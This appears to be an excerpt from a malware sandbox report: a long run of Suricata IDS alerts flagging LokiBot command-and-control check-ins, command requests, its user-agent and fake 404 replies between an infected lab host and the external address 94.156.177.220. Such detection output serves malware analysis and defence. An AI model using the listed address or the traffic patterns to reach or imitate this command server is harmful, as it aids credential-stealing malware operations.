          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49223 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49246 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49223 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49249 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49191
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49233
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49226 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49226 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49186 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49226
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49201
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49214 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49215 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49235 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49199 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49235 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49199 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49199 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49235 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49235 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49197 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49251 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49251 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49251 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49199 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49199 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49235
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49202 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49251 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49184 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49249 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49202 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49202 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49184 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49211
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49215 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49214 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49230 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49230 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49209 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49230 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49217 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49222
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49251 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49225
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49246 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49230 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49246 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49238 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49244 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49244 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49244 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49209 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49209 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49214 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49223
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49214 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49243 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49243 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49246 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49256 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49186 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49256 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49186 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49217
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49253
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49230 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49184 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49249
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49184
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49218 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49243 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49192
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49197
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49199
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49209 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49202
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49215 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49218 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49228
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49218 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49231 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49256 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49231 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49186
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49215 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49239 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49209 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49239 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49239 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49244 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49230
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49210 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49210 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49243 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49246 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49218 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49219 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49250 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49256 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49250 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49238 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49244 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49210 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49238 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49243 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49231 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49236 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49236 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49209
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49210 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49194 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49239 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49203 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49238 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49231 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49203 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49203 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49241 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49194 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49215 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49207 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49210 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49207 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49203 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49218 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49214
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49256 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49236 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49241 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49241 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49219 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49243
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49236 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49236 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49203 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49215
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49210
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49239 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49220 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49250 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49207 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49238 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49231 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49251
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49219 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49241 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49195 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49203
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49195 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49207 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49219 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49219 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49250 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49250 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49219
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49239
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49241 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49195 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49236
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49195 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49207 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49246
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49212 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49238
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49237 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49231
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49195 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49248 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49218
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49220 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49212 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49212 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49216 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49212 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49216 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49212 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49216 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49250
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49237 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49241
          Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49216 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49205 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49244
          Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49221 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49205 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49221 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49205 -> 94.156.177.220:80
          Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49220 -> 94.156.177.220:80
